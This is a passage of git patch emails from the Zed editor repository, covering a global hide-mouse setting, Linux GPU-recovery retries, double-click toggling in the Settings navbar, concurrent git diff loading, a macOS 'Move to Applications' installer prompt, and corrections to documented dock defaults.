SettingsContent { @@ -156,6 +185,13 @@ pub struct SettingsContent { /// Default: false pub helix_mode: Option, + /// Determines when the mouse cursor should be hidden in response to + /// keyboard input. Applies globally across all input surfaces (editors, + /// terminals, palettes, etc.). + /// + /// Default: on_typing_and_action + pub hide_mouse: Option, + pub journal: Option, /// A map of log scopes to the desired log level. 
diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index a43c566d1a7524..ce0c53b3822e26 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -1145,9 +1145,9 @@ fn appearance_page() -> SettingsPage { description: "When to hide the mouse cursor.", field: Box::new(SettingField { json_path: Some("hide_mouse"), - pick: |settings_content| settings_content.editor.hide_mouse.as_ref(), + pick: |settings_content| settings_content.hide_mouse.as_ref(), write: |settings_content, value, _| { - settings_content.editor.hide_mouse = value; + settings_content.hide_mouse = value; }, }), metadata: None, diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index eebad4d4382b70..d61b0547aef5ce 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -7,8 +7,8 @@ mod surround; use editor::display_map::{DisplayRow, DisplaySnapshot}; use editor::{ - DisplayPoint, Editor, EditorSettings, HideMouseCursorOrigin, MultiBufferOffset, - NavigationOverlayLabel, NavigationTargetOverlay, SelectionEffects, ToOffset, ToPoint, movement, + DisplayPoint, Editor, EditorSettings, MultiBufferOffset, NavigationOverlayLabel, + NavigationTargetOverlay, SelectionEffects, ToOffset, ToPoint, movement, }; use gpui::actions; use gpui::{App, Context, Font, Hsla, Pixels, Window, WindowTextSystem}; @@ -807,7 +807,6 @@ impl Vim { ) { let count = Vim::take_count(cx).unwrap_or(1); self.update_editor(cx, |_, editor, cx| { - editor.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); let mut selections = editor.selections.all::(&display_map); let max_point = display_map.buffer_snapshot().max_point(); diff --git a/crates/vim/src/vim.rs b/crates/vim/src/vim.rs index a76846fd33dd89..6c0c3d0201b490 100644 --- a/crates/vim/src/vim.rs +++ b/crates/vim/src/vim.rs @@ -22,8 +22,8 @@ mod visual; use crate::normal::paste::Paste as VimPaste; use 
collections::HashMap; use editor::{ - Anchor, Bias, Editor, EditorEvent, EditorSettings, HideMouseCursorOrigin, MultiBufferOffset, - NavigationOverlayKey, NavigationTargetOverlay, SelectionEffects, + Anchor, Bias, Editor, EditorEvent, EditorSettings, MultiBufferOffset, NavigationOverlayKey, + NavigationTargetOverlay, SelectionEffects, actions::Paste, display_map::ToDisplayPoint, movement::{self, FindRange}, @@ -1089,10 +1089,6 @@ impl Vim { if let Some(action) = keystroke_event.action.as_ref() { // Keystroke is handled by the vim system, so continue forward if action.name().starts_with("vim::") { - self.update_editor(cx, |_, editor, cx| { - editor.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx) - }); - return; } } else if window.has_pending_keystrokes() || keystroke_event.keystroke.is_ime_in_progress() diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 9461c89b7ad680..e9da59396092a6 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -382,6 +382,8 @@ pub fn initialize_workspace(app_state: Arc, cx: &mut App) { }) .detach(); + init_cursor_hide_mode(cx); + cx.observe_new(|_multi_workspace: &mut MultiWorkspace, window, cx| { let Some(window) = window else { return; @@ -1852,6 +1854,25 @@ fn notify_settings_errors(result: settings::SettingsParseResult, is_user: bool, }; } +#[derive(Copy, Clone, Debug, settings::RegisterSetting)] +struct CursorHideModeSetting(gpui::CursorHideMode); + +impl Settings for CursorHideModeSetting { + fn from_settings(content: &settings::SettingsContent) -> Self { + Self(match content.hide_mouse.unwrap_or_default() { + settings::HideMouseMode::Never => gpui::CursorHideMode::Never, + settings::HideMouseMode::OnTyping => gpui::CursorHideMode::OnTyping, + settings::HideMouseMode::OnTypingAndAction => gpui::CursorHideMode::OnTypingAndAction, + }) + } +} + +fn init_cursor_hide_mode(cx: &mut App) { + let apply = |cx: &mut App| cx.set_cursor_hide_mode(CursorHideModeSetting::get_global(cx).0); + apply(cx); + 
cx.observe_global::(apply).detach(); +} + pub fn watch_settings_files(fs: Arc, cx: &mut App) { MigrationNotification::set_global(cx.new(|_| MigrationNotification), cx); diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index eb4ccd1259ea4e..bc20f1cf57ae44 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -801,9 +801,8 @@ List of `string` values ## Hide Mouse -- Description: Determines when the mouse cursor should be hidden in an editor or input box. -- Setting: `hide_mouse` -- Default: `on_typing_and_movement` +- Description: Determines when the mouse cursor should be hidden in response to keyboard input. +- Default: `on_typing_and_action` **Options** @@ -823,11 +822,11 @@ List of `string` values } ``` -3. Hide on both typing and cursor movement: +3. Hide on typing and on key bindings that resolve to an action: ```json [settings] { - "hide_mouse": "on_typing_and_movement" + "hide_mouse": "on_typing_and_action" } ``` diff --git a/docs/src/visual-customization.md b/docs/src/visual-customization.md index 6140475eb71294..7c5b9f000e66ff 100644 --- a/docs/src/visual-customization.md +++ b/docs/src/visual-customization.md @@ -183,8 +183,8 @@ TBD: Centered layout related settings // Highlight the current line in the editor: none, gutter, line, all "current_line_highlight": "all", - // When does the mouse cursor hide: never, on_typing, on_typing_and_movement - "hide_mouse": "on_typing_and_movement", + // When does the mouse cursor hide: never, on_typing, on_typing_and_action + "hide_mouse": "on_typing_and_action", // Whether to highlight all occurrences of the selected text in an editor. 
"selection_highlight": true, From 8a4c6374aa8220b60e92036f2cc8adf76ed961a2 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Mon, 4 May 2026 20:24:23 -0600 Subject: [PATCH 177/231] Try to reduce linux wGPU crashes better (#55343) Updates #54349 There were two problems: * The crash never happened, instead we'd always retry. * When re-trying it seemed like we were picking llvmpipe. Claude's suggestion was that immediately after wake, the real GPU isn't yet awake, and so we pick llvm. Avoid this by disallowing llvmpipe on retry Release Notes: - linux: Reduced crash rate when recovering GPUs --- crates/gpui_linux/src/linux/wayland/window.rs | 15 +++--- crates/gpui_linux/src/linux/x11/window.rs | 15 +++--- crates/gpui_wgpu/src/wgpu_context.rs | 47 ++++++++++++++++--- crates/gpui_wgpu/src/wgpu_renderer.rs | 15 ++++-- 4 files changed, 63 insertions(+), 29 deletions(-) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 5d53496c057f1a..857289a1d9708a 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -1387,16 +1387,13 @@ impl PlatformWindow for WaylandWindow { .display_ptr() .cast::(), }; - state.renderer.recover(&raw_window).unwrap_or_else(|err| { - panic!( - "GPU device lost and recovery failed. \ - This may happen after system suspend/resume. \ - Please restart the application.\n\nError: {err}" - ) - }); + match state.renderer.recover(&raw_window) { + Ok(()) => {} + Err(err) => { + log::warn!("GPU recovery failed, will retry on next frame: {err}"); + } + } - // The current scene references atlas textures that were cleared during recovery. - // Skip this frame and let the next frame rebuild the scene with fresh textures. 
state.force_render_after_recovery = true; return; } diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index b44ac2faf41821..325d70eb311743 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -1670,16 +1670,13 @@ impl PlatformWindow for X11Window { window_id: self.0.x_window, visual_id: inner.visual_id, }; - inner.renderer.recover(&raw_window).unwrap_or_else(|err| { - panic!( - "GPU device lost and recovery failed. \ - This may happen after system suspend/resume. \ - Please restart the application.\n\nError: {err}" - ) - }); + match inner.renderer.recover(&raw_window) { + Ok(()) => {} + Err(err) => { + log::warn!("GPU recovery failed, will retry on next frame: {err}"); + } + } - // The current scene references atlas textures that were cleared during recovery. - // Skip this frame and let the next frame rebuild the scene with fresh textures. inner.force_render_after_recovery = true; return; } diff --git a/crates/gpui_wgpu/src/wgpu_context.rs b/crates/gpui_wgpu/src/wgpu_context.rs index 80900311b2d11b..d25e1dc71c982a 100644 --- a/crates/gpui_wgpu/src/wgpu_context.rs +++ b/crates/gpui_wgpu/src/wgpu_context.rs @@ -28,6 +28,25 @@ impl WgpuContext { instance: wgpu::Instance, surface: &wgpu::Surface<'_>, compositor_gpu: Option, + ) -> anyhow::Result { + Self::new_with_options(instance, surface, compositor_gpu, false) + } + + #[cfg(not(target_family = "wasm"))] + pub fn new_rejecting_software( + instance: wgpu::Instance, + surface: &wgpu::Surface<'_>, + compositor_gpu: Option, + ) -> anyhow::Result { + Self::new_with_options(instance, surface, compositor_gpu, true) + } + + #[cfg(not(target_family = "wasm"))] + fn new_with_options( + instance: wgpu::Instance, + surface: &wgpu::Surface<'_>, + compositor_gpu: Option, + reject_software: bool, ) -> anyhow::Result { let device_id_filter = match std::env::var("ZED_DEVICE_ID") { Ok(val) => parse_pci_id(&val) @@ -49,6 +68,7 @@ impl 
WgpuContext { device_id_filter, surface, compositor_gpu.as_ref(), + reject_software, ))?; let device_lost = Arc::new(AtomicBool::new(false)); @@ -197,6 +217,7 @@ impl WgpuContext { device_id_filter: Option, surface: &wgpu::Surface<'_>, compositor_gpu: Option<&CompositorGpuHint>, + reject_software: bool, ) -> anyhow::Result<( wgpu::Adapter, wgpu::Device, @@ -244,12 +265,16 @@ impl WgpuContext { _ => 1, }; - let type_priority: u8 = match info.device_type { - wgpu::DeviceType::DiscreteGpu => 0, - wgpu::DeviceType::IntegratedGpu => 1, - wgpu::DeviceType::Other => 2, - wgpu::DeviceType::VirtualGpu => 3, - wgpu::DeviceType::Cpu => 4, + let type_priority: u8 = if info.device_type == wgpu::DeviceType::Cpu { + 4 + } else { + match info.device_type { + wgpu::DeviceType::DiscreteGpu => 0, + wgpu::DeviceType::IntegratedGpu => 1, + wgpu::DeviceType::Other => 2, + wgpu::DeviceType::VirtualGpu => 3, + wgpu::DeviceType::Cpu => 4, + } }; let backend_priority: u8 = match info.backend { @@ -284,6 +309,16 @@ impl WgpuContext { // Test each adapter by creating a device and configuring the surface for adapter in adapters { let info = adapter.get_info(); + + if reject_software && info.device_type == wgpu::DeviceType::Cpu { + log::info!( + "Skipping software renderer: {} ({:?})", + info.name, + info.backend + ); + continue; + } + log::info!("Testing adapter: {} ({:?})...", info.name, info.backend); match Self::try_adapter_with_surface(&adapter, surface).await { diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index 7377c73fea1030..da7e71c726b791 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -1097,15 +1097,16 @@ impl WgpuRenderer { ); // TBD. Does retrying more actually help? - if self.failed_frame_count > 5 { + if self.failed_frame_count > 10 { + panic!("Too many consecutive GPU errors. 
Last error: {error}"); + } else if self.failed_frame_count > 5 { if let Some(res) = self.resources.as_mut() { res.invalidate_intermediate_textures(); } self.atlas.clear(); self.needs_redraw = true; + self.failed_frame_count = 0; return; - } else if self.failed_frame_count > 10 { - panic!("Too many consecutive GPU errors. Last error: {error}"); } } else { self.failed_frame_count = 0; @@ -1799,12 +1800,16 @@ impl WgpuRenderer { self.resources = None; *gpu_context.borrow_mut() = None; - // Wait for GPU driver to stabilize (350ms copied from windows :shrug:) + // Wait briefly for the GPU driver to stabilize, then try to + // recreate the context without software renderers. If this fails + // the caller should request another frame and retry — the real GPU + // may need more time to come back (e.g. after suspend/resume). std::thread::sleep(std::time::Duration::from_millis(350)); let instance = WgpuContext::instance(Box::new(window.clone())); let surface = create_surface(&instance, window_handle.as_raw())?; - let new_context = WgpuContext::new(instance, &surface, self.compositor_gpu)?; + let new_context = + WgpuContext::new_rejecting_software(instance, &surface, self.compositor_gpu)?; *gpu_context.borrow_mut() = Some(new_context); surface } else { From 57048346ece4b31ccd6bc601a7d9963a63cc6878 Mon Sep 17 00:00:00 2001 From: najeira Date: Tue, 5 May 2026 11:48:49 +0900 Subject: [PATCH 178/231] settings_ui: Toggle root navbar entries on double-click (#55526) Settings navbar root entries can now be expanded or collapsed by double-clicking the row itself. Single-click navigation is preserved, so clicking a root entry still opens the selected Settings page. The double-click handler only toggles on `click_count() == 2`, so triple-clicking the row does not toggle it again. The double-click path reuses the same toggle-and-focus behavior as the disclosure chevron. 
Testing: - `cargo fmt --check --package settings_ui` - `cargo check -p settings_ui` - `cargo test -p settings_ui` - Manually verified that: - single-clicking a Settings navbar root entry still opens the selected Settings page - double-clicking a Settings navbar root entry expands or collapses it - triple-clicking the row does not toggle the entry again - clicking the disclosure chevron still expands or collapses the entry Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Improved Settings navigation by allowing root navbar entries to expand or collapse on double-click. --- crates/settings_ui/src/settings_ui.rs | 134 ++++++++++++++++++++++++-- 1 file changed, 128 insertions(+), 6 deletions(-) diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index d22687b0b757d4..f17caafce5ea07 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -1727,6 +1727,35 @@ impl SettingsWindow { self.reset_list_state(); } + fn toggle_and_focus_navbar_entry( + &mut self, + nav_entry_index: usize, + window: &mut Window, + cx: &mut Context, + ) { + self.toggle_navbar_entry(nav_entry_index); + window.focus(&self.navbar_entries[nav_entry_index].focus_handle, cx); + cx.notify(); + } + + fn toggle_navbar_entry_on_double_click( + &mut self, + nav_entry_index: usize, + event: &gpui::ClickEvent, + window: &mut Window, + cx: &mut Context, + ) -> bool { + let Some(entry) = self.navbar_entries.get(nav_entry_index) else { + return false; + }; + if !entry.is_root || event.click_count() != 2 { + return false; + } + + self.toggle_and_focus_navbar_entry(nav_entry_index, 
window, cx); + true + } + fn build_navbar(&mut self, cx: &App) { let mut navbar_entries = Vec::new(); @@ -2740,13 +2769,11 @@ impl SettingsWindow { item.expanded(entry.expanded || this.has_query) .on_toggle(cx.listener( move |this, _, window, cx| { - this.toggle_navbar_entry(entry_index); - window.focus( - &this.navbar_entries[entry_index] - .focus_handle, + this.toggle_and_focus_navbar_entry( + entry_index, + window, cx, ); - cx.notify(); }, )) }) @@ -2755,7 +2782,17 @@ impl SettingsWindow { let subcategory = (!entry.is_root).then_some(entry.title); - cx.listener(move |this, _, window, cx| { + cx.listener(move |this, event: &gpui::ClickEvent, window, cx| { + if this.toggle_navbar_entry_on_double_click( + entry_index, + event, + window, + cx, + ) + { + return; + } + telemetry::event!( "Settings Navigation Clicked", category = category, @@ -4750,6 +4787,91 @@ pub mod test { " ); + #[gpui::test] + fn navbar_double_click_toggle(cx: &mut gpui::TestAppContext) { + let (settings_window, cx) = cx.add_window_view(|window, cx| { + register_settings(cx); + let mut settings_window = parse( + r" + > General* + - General + - Privacy + v Project + - Project Settings + ", + window, + cx, + ); + settings_window.build_content_handles(window, cx); + settings_window + }); + + settings_window.update_in(cx, |settings_window, window, cx| { + let general_idx = settings_window + .navbar_entries + .iter() + .position(|entry| entry.title == "General" && entry.is_root) + .expect("General root entry should exist"); + let privacy_idx = settings_window + .navbar_entries + .iter() + .position(|entry| entry.title == "Privacy" && !entry.is_root) + .expect("Privacy nested entry should exist"); + + let click_event = |click_count| { + gpui::ClickEvent::Mouse(gpui::MouseClickEvent { + down: gpui::MouseDownEvent { + button: gpui::MouseButton::Left, + click_count, + ..Default::default() + }, + up: gpui::MouseUpEvent { + button: gpui::MouseButton::Left, + click_count, + ..Default::default() + }, + }) + 
}; + + assert!( + !settings_window.toggle_navbar_entry_on_double_click( + general_idx, + &click_event(1), + window, + cx, + ), + "single-clicks should use the normal navigation path" + ); + assert!(!settings_window.navbar_entries[general_idx].expanded); + + assert!(settings_window.toggle_navbar_entry_on_double_click( + general_idx, + &click_event(2), + window, + cx, + )); + assert!(settings_window.navbar_entries[general_idx].expanded); + + assert!( + !settings_window.toggle_navbar_entry_on_double_click( + general_idx, + &click_event(3), + window, + cx, + ), + "triple-clicks should not toggle the entry again" + ); + assert!(settings_window.navbar_entries[general_idx].expanded); + + assert!(!settings_window.toggle_navbar_entry_on_double_click( + privacy_idx, + &click_event(2), + window, + cx, + )); + }); + } + #[gpui::test] async fn test_settings_window_shows_worktrees_from_multiple_workspaces( cx: &mut gpui::TestAppContext, From 3ab6dc5bfbba2fd70908748a6a031d1ccac99430 Mon Sep 17 00:00:00 2001 From: Xiaobo Liu Date: Tue, 5 May 2026 11:06:37 +0800 Subject: [PATCH 179/231] project: Load git diff bases concurrently (#55480) Use `future::join` when loading index and committed text for buffer diff bases, while keeping skipped loads as ready None futures. 
Release Notes: - N/A Signed-off-by: Xiaobo Liu --- crates/project/src/git_store.rs | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index f5dd3bef95c033..1e347b6af489c8 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -4565,15 +4565,16 @@ impl Repository { &repo_diff_state_updates { let index_text = if current_index_text.is_some() { - backend.load_index_text(repo_path.clone()).await + backend.load_index_text(repo_path.clone()) } else { - None + future::ready(None).boxed() }; let head_text = if current_head_text.is_some() { - backend.load_committed_text(repo_path.clone()).await + backend.load_committed_text(repo_path.clone()) } else { - None + future::ready(None).boxed() }; + let (index_text, head_text) = future::join(index_text, head_text).await; let change = match (current_index_text.as_ref(), current_head_text.as_ref()) { From d635f7b3590fcb4ed14d216dda58d9ccbcd0368c Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Mon, 4 May 2026 21:48:55 -0600 Subject: [PATCH 180/231] Add Move to Applications (#54719) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Release Notes: - Added a prompt to move Zed to /Applications on macOS when run from within the .dmg --- crates/gpui_macos/src/platform.rs | 18 +- crates/zed/src/main.rs | 2 + crates/zed/src/zed.rs | 2 + crates/zed/src/zed/move_to_applications.rs | 320 +++++++++++++++++++++ 4 files changed, 334 insertions(+), 8 deletions(-) create mode 100644 crates/zed/src/zed/move_to_applications.rs diff --git a/crates/gpui_macos/src/platform.rs 
b/crates/gpui_macos/src/platform.rs index 77cf85a8d1d340..92df05b39a7810 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -520,17 +520,19 @@ impl Platform for MacPlatform { } } - fn restart(&self, _binary_path: Option) { + fn restart(&self, binary_path: Option) { use std::os::unix::process::CommandExt as _; let app_pid = std::process::id().to_string(); - let app_path = self - .app_path() - .ok() - // When the app is not bundled, `app_path` returns the - // directory containing the executable. Disregard this - // and get the path to the executable itself. - .and_then(|path| (path.extension()?.to_str()? == "app").then_some(path)) + let app_path = binary_path + .or_else(|| { + self.app_path() + .ok() + // When the app is not bundled, `app_path` returns the + // directory containing the executable. Disregard this + // and get the path to the executable itself. + .and_then(|path| (path.extension()?.to_str()? == "app").then_some(path)) + }) .unwrap_or_else(|| std::env::current_exe().unwrap()); // Wait until this process has exited and then re-open this path. 
diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index f8023224a3365a..8f417ee08abcbf 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -576,6 +576,8 @@ fn main() { Client::set_global(client.clone(), cx); zed::init(cx); + #[cfg(target_os = "macos")] + zed::move_to_applications::init(cx); project::Project::init(&client, cx); debugger_ui::init(cx); debugger_tools::init(cx); diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index e9da59396092a6..3afd117a015de7 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -3,6 +3,8 @@ pub mod edit_prediction_registry; #[cfg(target_os = "macos")] pub(crate) mod mac_only_instance; mod migrate; +#[cfg(target_os = "macos")] +pub(crate) mod move_to_applications; mod open_listener; mod open_url_modal; mod quick_action_bar; diff --git a/crates/zed/src/zed/move_to_applications.rs b/crates/zed/src/zed/move_to_applications.rs new file mode 100644 index 00000000000000..10bd4b80472353 --- /dev/null +++ b/crates/zed/src/zed/move_to_applications.rs @@ -0,0 +1,320 @@ +use anyhow::{Context as _, Result}; +use db::kvp::KeyValueStore; +use gpui::{ + App, AsyncWindowContext, Context, DismissEvent, EventEmitter, FocusHandle, Focusable, + PromptButton, PromptLevel, Render, WeakEntity, Window, +}; +use std::ffi::OsString; +use std::path::{Path, PathBuf}; +use std::sync::atomic::{AtomicBool, Ordering}; +use ui::{ + ActiveTheme, Color, CommonAnimationExt, Icon, IconName, IconSize, IntoElement, Label, + LabelCommon, LabelSize, ParentElement, Styled, StyledExt, div, h_flex, v_flex, +}; +use util::ResultExt; +use util::command::new_command; +use workspace::{ModalView, MultiWorkspace}; + +const DONT_ASK_AGAIN_KEY: &str = "move_to_applications_dont_ask_again"; +static PROMPTED_THIS_SESSION: AtomicBool = AtomicBool::new(false); + +pub fn init(cx: &mut App) { + let kvp = KeyValueStore::global(cx); + if matches!(kvp.read_kvp(DONT_ASK_AGAIN_KEY), Ok(Some(value)) if value == "true") { + return; + } + + let 
Some(request) = MoveToApplicationsRequest::new(cx).log_err().flatten() else { + return; + }; + + cx.observe_new(move |_workspace: &mut MultiWorkspace, window, cx| { + let Some(window) = window else { + return; + }; + + if PROMPTED_THIS_SESSION.swap(true, Ordering::AcqRel) { + return; + } + + let request = request.clone(); + cx.spawn_in(window, async move |workspace, cx| { + request.prompt(workspace, cx).await.log_err(); + }) + .detach(); + }) + .detach(); +} + +#[derive(Clone)] +struct MoveToApplicationsRequest { + app_path: PathBuf, +} + +impl MoveToApplicationsRequest { + fn new(cx: &App) -> Result> { + let app_path = match cx.app_path() { + Ok(app_path) => app_path, + Err(_) => return Ok(None), + }; + + if !should_offer_to_move(&app_path) { + return Ok(None); + } + + Ok(Some(Self { app_path })) + } + + async fn prompt( + self, + workspace: WeakEntity, + cx: &mut AsyncWindowContext, + ) -> Result<()> { + let response = cx + .prompt( + PromptLevel::Info, + "Move Zed to Applications?", + Some( + "Zed is running from a temporary location. 
Move it to Applications to finish installing it.", + ), + &[ + PromptButton::ok("Yes"), + PromptButton::cancel("No"), + PromptButton::new("Don't ask me again"), + ], + ) + .await?; + + match response { + 0 => { + workspace + .update_in(cx, |workspace, window, cx| { + workspace + .toggle_modal(window, cx, |_window, cx| InstallingZedModal::new(cx)); + }) + .ok(); + if let Err(error) = move_to_applications(&self.app_path, cx).await { + workspace + .update_in(cx, |workspace, _window, cx| { + if let Some(modal) = workspace.active_modal::(cx) { + modal.update(cx, |modal, cx| modal.finished(cx)); + } + }) + .ok(); + cx.prompt( + PromptLevel::Critical, + "Failed to move Zed to Applications", + Some(&error.to_string()), + &["Ok"], + ) + .await + .log_err(); + } + } + 2 => { + let kvp = cx.update(|_window, cx| KeyValueStore::global(cx))?; + kvp.write_kvp(DONT_ASK_AGAIN_KEY.to_string(), "true".to_string()) + .await?; + } + _ => {} + } + + Ok(()) + } +} + +pub struct InstallingZedModal { + focus_handle: FocusHandle, + finished: bool, +} + +impl InstallingZedModal { + fn new(cx: &mut Context) -> Self { + Self { + focus_handle: cx.focus_handle(), + finished: false, + } + } + + fn finished(&mut self, cx: &mut Context) { + self.finished = true; + cx.emit(DismissEvent); + } +} + +impl EventEmitter for InstallingZedModal {} + +impl ModalView for InstallingZedModal { + fn on_before_dismiss( + &mut self, + _window: &mut Window, + _: &mut Context, + ) -> workspace::DismissDecision { + workspace::DismissDecision::Dismiss(self.finished) + } + + fn fade_out_background(&self) -> bool { + true + } +} + +impl Focusable for InstallingZedModal { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() + } +} + +impl Render for InstallingZedModal { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + let theme = cx.theme(); + + v_flex() + .elevation_3(cx) + .w_80() + .overflow_hidden() + .child( + div() + .px_4() + .py_3() + 
.border_b_1() + .border_color(theme.colors().border_variant) + .child(Label::new("Installing Zed…")), + ) + .child( + h_flex() + .w_full() + .gap_3() + .px_4() + .py_3() + .bg(theme.colors().editor_background) + .child( + Icon::new(IconName::ArrowCircle) + .size(IconSize::Medium) + .color(Color::Accent) + .with_rotate_animation(3), + ) + .child( + v_flex() + .gap_1() + .child(Label::new("Moving Zed to Applications")) + .child( + Label::new("Zed will reopen when installation is complete.") + .size(LabelSize::Small) + .color(Color::Muted), + ), + ), + ) + } +} + +fn should_offer_to_move(app_path: &Path) -> bool { + app_path.starts_with(Path::new("/Volumes")) + || app_path.to_string_lossy().contains("/AppTranslocation/") +} + +async fn move_to_applications(app_path: &Path, cx: &mut AsyncWindowContext) -> Result<()> { + let destination_path = install_destination(app_path).await?; + restart_into(destination_path, cx) +} + +async fn install_destination(app_path: &Path) -> Result { + let app_name = app_path + .file_name() + .context("invalid app path: missing app bundle name")?; + + let system_destination = Path::new("/Applications").join(app_name); + if system_destination.exists() { + copy_app_bundle(app_path, &system_destination) + .await + .with_context(|| { + format!( + "failed to replace existing app at {}", + system_destination.display() + ) + })?; + return Ok(system_destination); + } + + if let Some(user_destination) = user_applications_directory().map(|path| path.join(app_name)) + && user_destination.exists() + { + copy_app_bundle(app_path, &user_destination) + .await + .with_context(|| { + format!( + "failed to replace existing app at {}", + user_destination.display() + ) + })?; + return Ok(user_destination); + } + + match copy_app_bundle(app_path, &system_destination).await { + Ok(()) => Ok(system_destination), + Err(system_error) => { + let user_applications_directory = user_applications_directory() + .context("could not determine a writable Applications 
directory")?; + smol::fs::create_dir_all(&user_applications_directory) + .await + .with_context(|| { + format!("failed to create {}", user_applications_directory.display()) + })?; + let user_destination = user_applications_directory.join(app_name); + copy_app_bundle(app_path, &user_destination) + .await + .with_context(|| { + format!( + "failed to copy app to {} after system Applications copy failed: {system_error:#}", + user_destination.display() + ) + })?; + Ok(user_destination) + } + } +} + +async fn copy_app_bundle(source: &Path, destination: &Path) -> Result<()> { + let parent = destination + .parent() + .context("invalid destination path: missing parent directory")?; + smol::fs::create_dir_all(parent) + .await + .with_context(|| format!("failed to create {}", parent.display()))?; + + let mut source_with_contents: OsString = source.into(); + source_with_contents.push("/"); + let mut destination_with_contents: OsString = destination.into(); + destination_with_contents.push("/"); + + let mut command = new_command("rsync"); + command + .args(["-a", "--delete"]) + .arg(&source_with_contents) + .arg(&destination_with_contents); + let output = command + .output() + .await + .with_context(|| format!("failed to run rsync for {}", source.display()))?; + + anyhow::ensure!( + output.status.success(), + "failed to copy app bundle: {}", + String::from_utf8_lossy(&output.stderr) + ); + + Ok(()) +} + +fn restart_into(app_path: PathBuf, cx: &mut AsyncWindowContext) -> Result<()> { + cx.update(|_window, cx| { + cx.set_restart_path(app_path); + cx.restart(); + })?; + Ok(()) +} + +fn user_applications_directory() -> Option { + std::env::var_os("HOME") + .map(PathBuf::from) + .map(|home| home.join("Applications")) +} From 408198a537659bc3f4b1d6c0c7efdc02dca9a969 Mon Sep 17 00:00:00 2001 From: js <46874769+javier-solis@users.noreply.github.com> Date: Mon, 4 May 2026 20:59:02 -0700 Subject: [PATCH 181/231] Update panel dock default values in settings docs (#55719) MIME-Version: 1.0 
Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The [Parallel Agents release](https://zed.dev/blog/parallel-agents) introduced a new default layout: the agent panel now docks on the left, while the project, git, outline, and collaboration panels now dock on the right. The rustdoc comments in `crates/settings_content` were not updated to reflect this change. This PR corrects the `Default:` values in the following structs: - `ProjectPanelSettingsContent.dock`: `left` → `right` - `GitPanelSettingsContent.dock`: `left` → `right` - `PanelSettingsContent.dock` (collaboration panel): `left` → `right` - `OutlinePanelSettingsContent.dock`: `left` → `right` - `AgentSettingsContent.dock`: `right` → `left` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/settings_content/src/agent.rs | 2 +- crates/settings_content/src/settings_content.rs | 6 +++--- crates/settings_content/src/workspace.rs | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 26b563e0842708..431937dce30c89 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -84,7 +84,7 @@ pub struct AgentSettingsContent { pub button: Option, /// Where to dock the agent panel. /// - /// Default: right + /// Default: left pub dock: Option, /// Whether the agent panel should use flexible (proportional) sizing. 
